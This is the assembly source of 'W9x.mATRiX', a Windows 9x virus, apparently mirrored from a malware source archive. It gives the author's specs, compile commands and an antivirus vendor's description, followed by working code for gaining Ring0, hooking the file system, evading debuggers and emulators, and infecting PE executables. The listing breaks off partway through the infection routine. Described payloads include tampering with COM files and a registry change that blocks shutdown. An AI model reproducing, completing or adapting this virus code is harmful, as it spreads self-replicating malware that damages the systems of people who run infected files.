mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-10 20:35:27 +00:00
2483 lines
70 KiB
NASM
2483 lines
70 KiB
NASM
|
comment <EFBFBD>
|
|||
|
|
|||
|
released
|
|||
|
|
|||
|
<EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>2000
|
|||
|
<EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD>۰۰<EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۰<EFBFBD><EFBFBD><EFBFBD>۰ <EFBFBD><EFBFBD>
|
|||
|
<EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܲ<EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܲ<EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[LW]
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD>
|
|||
|
W9x.mATRiX.size by LiFEwiRE [ShadowVX] - www.shadowvx.org
|
|||
|
|
|||
|
|
|||
|
Intro
|
|||
|
|
|||
|
This virus is my first windows virus, and the result of reading some
|
|||
|
docs, tutorial and (Ring0 virus)-sources.
|
|||
|
|
|||
|
It is not a very complicated virus, and it doesn't use new technics
|
|||
|
too... Maybe the ASCII counter is some unusual feature.
|
|||
|
|
|||
|
When debugging is enabled, this things are extra:
|
|||
|
|
|||
|
Unload when dword at bff70400 <> 0h
|
|||
|
Beep at certain events (get resident, unload & infect)
|
|||
|
Beep can be turned off by changing byte ptr at bff70408 <> 0h
|
|||
|
only infects files at your D: drive (it's my test drive)
|
|||
|
|
|||
|
I use WinIce to modify the values.
|
|||
|
|
|||
|
Specs:
|
|||
|
|
|||
|
Ring0 resident, infects on IFSmgr file rename, open and attrib, EXE,
|
|||
|
SCR and COM (!) files. Com files are infected for the payload, a scene
|
|||
|
from The Matrix. The COM files are not really infected, but some date
|
|||
|
checking code and action is appended on it. When the month is equal
|
|||
|
to the date the payload will start.
|
|||
|
|
|||
|
Infection : Increasing last section, and make a jump at orignal
|
|||
|
entrypoint to it (when modifying EP to last section
|
|||
|
AVPM will popup:( )
|
|||
|
|
|||
|
Encryption : XOR'd and polymorfic-build-up-decryptors.
|
|||
|
Armour : Anti debugger & anti emulator (SEH & Anti-SoftICE)
|
|||
|
|
|||
|
Payload(s) : 2, as i said above 1 which is appended to all .com files
|
|||
|
on opening and c:\windows\win.com which will display
|
|||
|
'Wake up Neo... / The Matrix has you... / w9x.mATRiX'
|
|||
|
like in the movie (except the last sentence, w9x.mATRiX:)
|
|||
|
when the day is equal to the month (1 jan, 2 feb,etc.)
|
|||
|
|
|||
|
the other payload will remove the shutdown command from
|
|||
|
the start menu using the registery - at 06 april.
|
|||
|
|
|||
|
KnownBugs : No I know... I tested this code a lot, and a friend of me
|
|||
|
: infected his own PC accidently and it worked really good
|
|||
|
:)... The only problem is that F-prot hangs on infected
|
|||
|
files... hehe but that's not my problem :)
|
|||
|
|
|||
|
Thanx to : Lord Julus, Billy Belcebu & Z0MBiE.
|
|||
|
|
|||
|
Greets to : Ruzz', Kamaileon, z3r0, Bhunji, Dageshi, all other Shadow-
|
|||
|
VX members,
|
|||
|
r-, GigaByte, VirusBuster, CyberYoda, T00fic, all other
|
|||
|
people i met on #virus & #vir, and 29A & iKX for their
|
|||
|
nice magazines.
|
|||
|
|
|||
|
and some non-virus greets:
|
|||
|
|
|||
|
Ghostie :P, Hampy, nog wat XXXClan'ers, DJ Accelerator,
|
|||
|
King Smozzeboss SMOS from Conehead SMOS games [NL1SMS]
|
|||
|
PiepPiep, NL0JBL, BlueLIVE, MisterE & Xistence.
|
|||
|
|
|||
|
Compile: Tasm32 /m3 /ml LiFEwiRE.ASM,
|
|||
|
tlink32 /Tpe /aa /c LiFEwiRE.OBJ,,,import32.lib
|
|||
|
pewrsec LiFEwiRE.EXE
|
|||
|
|
|||
|
Contact: Lifewire@mail.ru
|
|||
|
|
|||
|
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD>
|
|||
|
|
|||
|
Description at www.viruslist.com
|
|||
|
|
|||
|
Win95.Matrix
|
|||
|
|
|||
|
|
|||
|
It is not a dangerous memory resident polymorphic parasitic Win9x virus. It
|
|||
|
stays in the Windows memory as a device driver (VxD) by switching from
|
|||
|
application mode to Windows kernel (Ring3->Ring0), hooks disk files access
|
|||
|
functions, and infect PE executable files with EXE and SCR file name
|
|||
|
extensions, and affects DOS COM files.
|
|||
|
|
|||
|
While infecting a PE EXE file the virus encrypts itself and writes to the
|
|||
|
file end. The virus also patches program's startup code with a short routine
|
|||
|
that passes control to main virus code.
|
|||
|
|
|||
|
While affecting DOS COM files the virus writes to the end of file a short
|
|||
|
routine that has no infection abilities, but just displays a message on
|
|||
|
July 7th:
|
|||
|
|
|||
|
Wake up, Neo...
|
|||
|
The Matrix has you...
|
|||
|
w9x.mATRiX
|
|||
|
|
|||
|
The virus also affects the C:\WINDOWS\WIN.COM file in the same way.
|
|||
|
|
|||
|
On April 6th the virus modifies the system registry key:
|
|||
|
|
|||
|
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoClose = 1
|
|||
|
|
|||
|
As the result of this key a user cannot switch off the computer.
|
|||
|
|
|||
|
The virus also deletes anti-virus data files: AVP.CRC, ANTI-VIR.DAT, IVB.NTZ,
|
|||
|
CHKLIST.MS.
|
|||
|
|
|||
|
The virus contains the text strings:
|
|||
|
|
|||
|
[- comment from LiFEwiRE- AV'ers forgot to put the strings here??]
|
|||
|
|
|||
|
where 'xxxxxxx' is the virus' "generation" number.
|
|||
|
|
|||
|
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD> <EFBFBD>
|
|||
|
|
|||
|
.486p
|
|||
|
.model flat
|
|||
|
locals
|
|||
|
jumps
|
|||
|
|
|||
|
extrn ExitProcess:PROC; ;only 4 first gen.
|
|||
|
|
|||
|
;----- -[Equ's]- ------------------------------------------------------------;
|
|||
|
|
|||
|
debug equ 1 ;test/debug version?
|
|||
|
|
|||
|
virusz equ offset end - offset start
|
|||
|
sectionflags equ 00000020h or 80000000h or 20000000h
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
inthook equ 05h ;let's hook this int for ring0
|
|||
|
else
|
|||
|
inthook equ 03h ;let's hook this int for ring0
|
|||
|
endif
|
|||
|
|
|||
|
JmpToCodesz equ offset EndJmpToCode-offset JmpToCode
|
|||
|
|
|||
|
IFSMgr equ 0040h ;for VxDCall
|
|||
|
InstallFileSystemApiHook equ 067h ;used in ring0 hooker
|
|||
|
UniToBCSPath equ 041h ;used in hook to convert uni2ansi
|
|||
|
Ring0_FileIO equ 032h ;for all file i/o
|
|||
|
|
|||
|
IFSFN_FILEATTRIB equ 21h ;hooked functions
|
|||
|
IFSFN_OPEN equ 24h
|
|||
|
IFSFN_RENAME equ 25h
|
|||
|
|
|||
|
R0_OPENCREATFILE equ 0D500h ;used with ring0_fileIO
|
|||
|
R0_CLOSEFILE equ 0D700h
|
|||
|
R0_WRITEFILE equ 0D601h
|
|||
|
R0_READFILE equ 0D600h
|
|||
|
R0_GETFILESIZE equ 0D800h
|
|||
|
R0_FILEATTRIBUTES equ 04300h
|
|||
|
GET_ATTRIBUTES equ 00h
|
|||
|
SET_ATTRIBUTES equ 01h
|
|||
|
R0_DELETEFILE equ 04100h
|
|||
|
|
|||
|
PC_STATIC equ 20000000h ;for allocating pages
|
|||
|
PC_WRITEABLE equ 00020000h ;and protecting them from
|
|||
|
PC_USER equ 00040000h ;ring3 code
|
|||
|
PAGEZEROINIT equ 00000001h
|
|||
|
PAGEFIXED equ 00000008h
|
|||
|
PG_SYS equ 1
|
|||
|
|
|||
|
Get_DDB equ 0146h ;VMMCall to find S-ICE
|
|||
|
|
|||
|
PageAllocate equ 0053h
|
|||
|
PageModifyPermissions equ 0133h
|
|||
|
|
|||
|
SizeInPages equ (virusz+1000 + 4095) / 4096
|
|||
|
|
|||
|
|
|||
|
RegOpenKey equ 0148h ;used by payload for registery
|
|||
|
RegSetValueEx equ 0152h ;modifying
|
|||
|
HKEY_CURRENT_USER equ 80000001h ;
|
|||
|
REG_DWORD equ 4 ;
|
|||
|
|
|||
|
|
|||
|
debug_beep_FREQ equ 1700 ;for debugging
|
|||
|
debug_beep_DELAY equ 50*65536
|
|||
|
|
|||
|
debug_beep_FREQ2 equ 700 ;for debugging
|
|||
|
debug_beep_DELAY2 equ 100*65536
|
|||
|
|
|||
|
;----- -[Macro's]- ----------------------------------------------------------;
|
|||
|
|
|||
|
VxDCall macro vxd_id, service_id
|
|||
|
int 20h
|
|||
|
dw service_id
|
|||
|
dw vxd_id
|
|||
|
endm
|
|||
|
|
|||
|
VMMCall macro service_id ;Is just less work than doing
|
|||
|
int 20h ;a VxDCall VMM, service
|
|||
|
dw service_id
|
|||
|
dw 0001h
|
|||
|
endm
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
; display "Debug Version"
|
|||
|
else
|
|||
|
display " <20><><EFBFBD><EFBFBD> *Warning* This is the real version of the virus ۲<><DBB2>"
|
|||
|
endif
|
|||
|
|
|||
|
;----- -[Code]- -------------------------------------------------------------;
|
|||
|
_CODE segment dword use32 public 'CODE'
|
|||
|
|
|||
|
start:
|
|||
|
pushad
|
|||
|
|
|||
|
call getdelta
|
|||
|
getdelta:
|
|||
|
pop ebp
|
|||
|
sub ebp,offset getdelta
|
|||
|
|
|||
|
sub eax,00001000h ;Get imagebase at runtime
|
|||
|
newEIP equ $-4
|
|||
|
|
|||
|
mov dword ptr [imagebase+ebp],eax
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
call setupSEHandKillEmu ;The call pushes the offset
|
|||
|
|
|||
|
mov esp,[esp+8] ;Error gives us old ESP
|
|||
|
jmp backtocode
|
|||
|
|
|||
|
setupSEHandKillEmu:
|
|||
|
xor edx,edx ;fs:[edx] = smaller then fs:[0]
|
|||
|
push dword ptr fs:[edx] ;Push original SEH handler
|
|||
|
mov fs:[edx],esp ;And put the new one (located
|
|||
|
dec byte ptr cs:[edx] ;make error & let our SEH take
|
|||
|
;control (not nice 4 emu's:)
|
|||
|
backtocode:
|
|||
|
|
|||
|
pop dword ptr fs:[0]
|
|||
|
pop edx ;pops EIP pushed by call setupSEH
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
call SetupSEH ;to kill errors
|
|||
|
|
|||
|
;if eip gets here an error has occured
|
|||
|
|
|||
|
mov esp,[esp+8] ;contains old ESP
|
|||
|
|
|||
|
jmp RestoreSEH ;...
|
|||
|
|
|||
|
SetupSEH:
|
|||
|
xor edx,edx ;we are save now, if an error
|
|||
|
push dword ptr fs:[edx] ;occure EIP will be at the
|
|||
|
mov fs:[edx],esp ;code after SetupSEH
|
|||
|
|
|||
|
push edx
|
|||
|
sidt fword ptr [esp-2] ;'push' int table
|
|||
|
pop edx ;restore stack from call and
|
|||
|
;edx contains pointer to IDT
|
|||
|
|
|||
|
add edx,(inthook*8)+4 ;Get int vector
|
|||
|
|
|||
|
mov ebx,dword ptr [edx]
|
|||
|
mov bx,word ptr [edx-4]
|
|||
|
|
|||
|
lea edi,dword ptr [ebp+Inthandler] ;routine to let int point to
|
|||
|
|
|||
|
mov word ptr [edx-4],di
|
|||
|
shr edi,16 ;high/low word
|
|||
|
mov word ptr [edx+2],di
|
|||
|
|
|||
|
int inthook ;call int, int will be ring0!
|
|||
|
|
|||
|
mov word ptr [edx-4],bx ;Restore old interrupt values
|
|||
|
shr ebx,16
|
|||
|
mov word ptr [edx+2],bx
|
|||
|
|
|||
|
|
|||
|
RestoreSEH:
|
|||
|
|
|||
|
xor edx,edx
|
|||
|
pop dword ptr fs:[edx]
|
|||
|
pop edx ;pops offset pushed by CALL
|
|||
|
|
|||
|
mov edi,dword ptr [imagebase+ebp] ;--- Restore old bytes ---;
|
|||
|
add edi,dword ptr [base+ebp] ;do at it ring0 to avoid
|
|||
|
;page errorz
|
|||
|
lea esi,[offset oldbytes+ebp]
|
|||
|
mov ecx,JmpToCodesz
|
|||
|
rep movsb ;restore bytes from host
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
mov eax,00h ;--- return to host ---;
|
|||
|
imagebase equ $-4
|
|||
|
add eax,offset host -0400000h ;1st gen
|
|||
|
base equ $-4
|
|||
|
|
|||
|
push eax
|
|||
|
ret
|
|||
|
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
; **** RING0 LOADER ****
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
Inthandler:
|
|||
|
pushad
|
|||
|
|
|||
|
mov eax,0bff70404h ;already loaded?
|
|||
|
cmp dword ptr [eax],eax
|
|||
|
je back2ring3
|
|||
|
mov dword ptr [eax],eax
|
|||
|
|
|||
|
push PAGEFIXED + PAGEZEROINIT
|
|||
|
xor eax, eax
|
|||
|
push eax ;PhysAddr
|
|||
|
push eax ;maxPhys
|
|||
|
push eax ;minPhys
|
|||
|
push eax ;Align
|
|||
|
push eax ;handle of VM = 0 if PG_SYS
|
|||
|
push PG_SYS ;allocate memory in system area
|
|||
|
push SizeInPages*2 ;nPages
|
|||
|
VxD1V equ 00010053h
|
|||
|
VxD1: VMMCall PageAllocate
|
|||
|
add esp, 8*4
|
|||
|
|
|||
|
or eax,eax ;eax = place in mem
|
|||
|
jz back2ring3 ;if zero error :(
|
|||
|
|
|||
|
mov edi,eax ;set (e)destination
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
push edi
|
|||
|
lea esi,[offset start+ebp] ;set source
|
|||
|
mov ecx,virusz ;virussize
|
|||
|
cld ;you never know with poly :)
|
|||
|
rep movsb ;copy virus to allocated mem
|
|||
|
pop edi
|
|||
|
|
|||
|
mov dword ptr [edi+delta-start],edi
|
|||
|
|
|||
|
lea ecx,[edi+offset hook-offset start] ;Install FileSystem Hook
|
|||
|
push ecx
|
|||
|
VxD2V equ InstallFileSystemApiHook+256*256*IFSMgr
|
|||
|
VxD2: VxDCall IFSMgr,InstallFileSystemApiHook
|
|||
|
pop ecx
|
|||
|
|
|||
|
mov [edi+nexthook-start],eax
|
|||
|
|
|||
|
pop eax
|
|||
|
|
|||
|
push PC_STATIC
|
|||
|
push 020060000h ;new paging settings
|
|||
|
push SizeInPages*2
|
|||
|
shr eax, 12
|
|||
|
push eax
|
|||
|
VxD5V equ 00010133h
|
|||
|
VxD5: VMMCall PageModifyPermissions
|
|||
|
add esp, 4*4
|
|||
|
|
|||
|
|
|||
|
call CheckThePayloadDate ;(and mayB do something:)
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
call debug_beep2
|
|||
|
endif
|
|||
|
|
|||
|
back2ring3:
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
call debug_beep
|
|||
|
endif
|
|||
|
|
|||
|
popad
|
|||
|
iretd ;exit int (to ring3!)
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
host:
|
|||
|
oldbytes:
|
|||
|
Push 0
|
|||
|
Call ExitProcess
|
|||
|
db JmpToCodesz-5 dup (176d)
|
|||
|
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
; **** FILESYSTEM HOOK ****
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
hook:
|
|||
|
push ebp
|
|||
|
mov ebp,esp
|
|||
|
|
|||
|
sub esp,20h
|
|||
|
|
|||
|
push ebx
|
|||
|
push esi
|
|||
|
push edi
|
|||
|
|
|||
|
db 0bfh ;mov edi,DeltaInMem
|
|||
|
delta dd 0
|
|||
|
|
|||
|
cmp dword ptr [busy-start+edi],not "BuSY" ;...are we busy?
|
|||
|
je back
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
cmp dword ptr [death-start+edi],'TRUE'
|
|||
|
je back
|
|||
|
endif
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+0Ch] ;EAX = Function
|
|||
|
not eax
|
|||
|
|
|||
|
cmp eax,not IFSFN_OPEN ;File Open? try it
|
|||
|
jz infect
|
|||
|
|
|||
|
cmp eax,not IFSFN_RENAME ;Rename? try it
|
|||
|
jz infect
|
|||
|
|
|||
|
cmp eax,not IFSFN_FILEATTRIB ;File Attributes? try it
|
|||
|
jz infect
|
|||
|
|
|||
|
back:
|
|||
|
mov eax,[ebp+28] ; call the old
|
|||
|
push eax
|
|||
|
mov eax,[ebp+24]
|
|||
|
push eax
|
|||
|
mov eax,[ebp+20]
|
|||
|
push eax
|
|||
|
mov eax,[ebp+16]
|
|||
|
push eax
|
|||
|
mov eax,[ebp+12]
|
|||
|
push eax
|
|||
|
mov eax,[ebp+8]
|
|||
|
push eax
|
|||
|
|
|||
|
db 0b8h
|
|||
|
nexthook dd 0
|
|||
|
call [eax]
|
|||
|
|
|||
|
add esp,6*4
|
|||
|
|
|||
|
pop edi
|
|||
|
pop esi
|
|||
|
pop ebx
|
|||
|
|
|||
|
leave
|
|||
|
ret
|
|||
|
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
; **** SOME CHECKS BEFORE INFECTING ****
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
infect:
|
|||
|
pushad
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
mov eax,0bff70400h
|
|||
|
mov eax,dword ptr [eax]
|
|||
|
or eax,eax
|
|||
|
jz stayalive ;kill ourself?
|
|||
|
|
|||
|
mov dword ptr [edi+death-start],'TRUE'
|
|||
|
|
|||
|
call debug_beep
|
|||
|
call debug_beep2
|
|||
|
call debug_beep2
|
|||
|
call debug_beep2
|
|||
|
call debug_beep
|
|||
|
|
|||
|
mov eax,0bff70400h
|
|||
|
|
|||
|
xor edx,edx
|
|||
|
mov dword ptr [eax],edx
|
|||
|
mov dword ptr [eax+4],edx
|
|||
|
|
|||
|
stayalive:
|
|||
|
|
|||
|
endif
|
|||
|
|
|||
|
mov dword ptr [busy-start+edi],not 'BuSY'
|
|||
|
|
|||
|
lea esi, [edi+filename-start] ;file buffer
|
|||
|
|
|||
|
mov eax, dword ptr [ebp+16]
|
|||
|
cmp al,0ffh ;no drive defined?
|
|||
|
je nopath
|
|||
|
add al,40h ;a=1,b=2,a+40h='A',b+40h='B'
|
|||
|
mov byte ptr [esi],al
|
|||
|
mov word ptr [esi+1],':'
|
|||
|
add esi,2
|
|||
|
nopath:
|
|||
|
xor eax,eax
|
|||
|
push eax ;push 0 ;BCS/WANSI
|
|||
|
inc ah ;ax=100h
|
|||
|
push eax ;push 100h ;buf size
|
|||
|
mov eax,[ebp+28]
|
|||
|
mov eax,[eax+12]
|
|||
|
add eax,4
|
|||
|
push eax ;filename
|
|||
|
push esi ;destination (buffer)
|
|||
|
|
|||
|
VxD3V equ UniToBCSPath+256*256*IFSMgr
|
|||
|
VxD3: VxDCall IFSMgr, UniToBCSPath ;Convert to ASCII
|
|||
|
|
|||
|
add esp,4*4 ;restore stack
|
|||
|
add esi,eax ;eax = lenght
|
|||
|
mov byte ptr [esi],0 ;make ASCIIZ
|
|||
|
|
|||
|
mov eax,dword ptr [esi-4]
|
|||
|
|
|||
|
not eax ;
|
|||
|
cmp eax,not 'EXE.' ;normal exe?
|
|||
|
je infectit
|
|||
|
|
|||
|
cmp eax,not 'RCS.' ;screensaver?
|
|||
|
je infectit
|
|||
|
|
|||
|
cmp eax,not 'MOC.' ;a com? (indeed !!:)
|
|||
|
jne nocomfile
|
|||
|
jmp payloadinfector
|
|||
|
nocomfile:
|
|||
|
|
|||
|
quitinfect:
|
|||
|
|
|||
|
mov dword ptr [busy-start+edi],eax ;hope eax <> 'busy' :)
|
|||
|
popad
|
|||
|
|
|||
|
jmp back
|
|||
|
|
|||
|
db "<w9x.mATRiX."
|
|||
|
db virusz/1000 mod 10+'0'
|
|||
|
db virusz/0100 mod 10+'0'
|
|||
|
db virusz/0010 mod 10+'0'
|
|||
|
db virusz/0001 mod 10+'0',"."
|
|||
|
counter db "0001086 & MyLittlePoly." ;enough space for counter :)
|
|||
|
db polysz/1000 mod 10+'0'
|
|||
|
db polysz/0100 mod 10+'0'
|
|||
|
db polysz/0010 mod 10+'0'
|
|||
|
db polysz/0001 mod 10+'0'
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
db " Debug Version"
|
|||
|
endif
|
|||
|
|
|||
|
db " by LiFEwiRE [sHAD0WvX]>"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
dontinfect: ;when attrs. were already modified
|
|||
|
pop esi ;get attribs + 1 = set
|
|||
|
pop ecx ;old attrs
|
|||
|
pop eax ;pointer to buffer with filen.
|
|||
|
call R0_FileIO ;RESTORE ATTRIBUTES
|
|||
|
jmp quitinfect
|
|||
|
|
|||
|
|
|||
|
cryptkey dd 0
|
|||
|
cryptkey2 dw 0
|
|||
|
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
; **** REAL PE INFECTION PART ****
|
|||
|
;----------------------------------------------------------------------------;
|
|||
|
|
|||
|
infectit:
|
|||
|
|
|||
|
lea esi, [edi+filename-start]
|
|||
|
|
|||
|
call checkname
|
|||
|
jc quitinfect ;if name = bad
|
|||
|
|
|||
|
if debug eq 1
|
|||
|
cmp word ptr [esi],":D"
|
|||
|
jne quitinfect
|
|||
|
endif
|
|||
|
|
|||
|
mov eax,R0_FILEATTRIBUTES + GET_ATTRIBUTES
|
|||
|
push eax
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
pop eax
|
|||
|
inc eax ;eax=4300+1 = set
|
|||
|
push eax
|
|||
|
push ecx ;save attribs
|
|||
|
push esi ;and esi,no new LEA needed
|
|||
|
xor ecx,ecx ;new attr
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
xor ecx,ecx ;ecx=0
|
|||
|
mov edx,ecx ;
|
|||
|
inc edx ;edx=1
|
|||
|
mov ebx,edx ;
|
|||
|
inc ebx ;ebx=2
|
|||
|
mov eax,R0_OPENCREATFILE
|
|||
|
call R0_FileIO
|
|||
|
jc dontinfect
|
|||
|
|
|||
|
mov ebx,eax ;file handle
|
|||
|
|
|||
|
lea esi,[edi+pointertope-start] ;read pointer to PE at 3ch
|
|||
|
mov ecx,4 ;into pointertope
|
|||
|
mov edx,03ch
|
|||
|
mov eax,R0_READFILE
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
lea esi,[edi+peheader-start] ;peheader buffer
|
|||
|
mov ecx,1024 ;1024 bytes
|
|||
|
mov edx,dword ptr [edi+pointertope-start] ;pointer to pe header
|
|||
|
mov eax,R0_READFILE ;...
|
|||
|
call R0_FileIO
|
|||
|
|
|||
|
cmp word ptr [esi],'EP' ;is pe?
|
|||
|
jne nope ;nope, its noPE :)
|
|||
|
|
|||
|
mov eax,0badc0deh ;already infected?
|
|||
|
cmp dword ptr [esi+4ch],eax ;4ch = reserved
|
|||
|
je nope
|
|||
|
mov dword ptr [esi+4ch],eax
|
|||
|
|
|||
|
push ebp
|
|||
|
push edi
|
|||
|
push ebx ;save handle for after calcs.
|
|||
|
|
|||
|
mov ebp,edi
|
|||
|
|
|||
|
mov edi,esi
|
|||
|
add esi,18h ;esi+18h=start of OptionalHeader
|
|||
|
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH
|
|||
|
;optionalheader+size=allocation table
|
|||
|
|
|||
|
;edi = PE/0/0, esi = allocation table
|
|||
|
|
|||
|
push esi
|
|||
|
xor ecx,ecx
|
|||
|
mov cx,word ptr [edi+6] ;put in ecx nr. of sections
|
|||
|
xor eax,eax ;startvalue of eax
|
|||
|
push cx ;
|
|||
|
sectionsearch:
|
|||
|
cmp dword ptr [esi+14h],eax ;is it the highest?
|
|||
|
jb lower ;no
|
|||
|
mov ebx,ecx ;remember section nr.
|
|||
|
mov eax,dword ptr [esi+14h] ;and remember value
|
|||
|
lower:
|
|||
|
add esi,28h ;steps of 28h
|
|||
|
loop sectionsearch
|
|||
|
pop cx
|
|||
|
|
|||
|
sub ecx,ebx
|
|||
|
|
|||
|
mov eax,28h ;multiply with section length
|
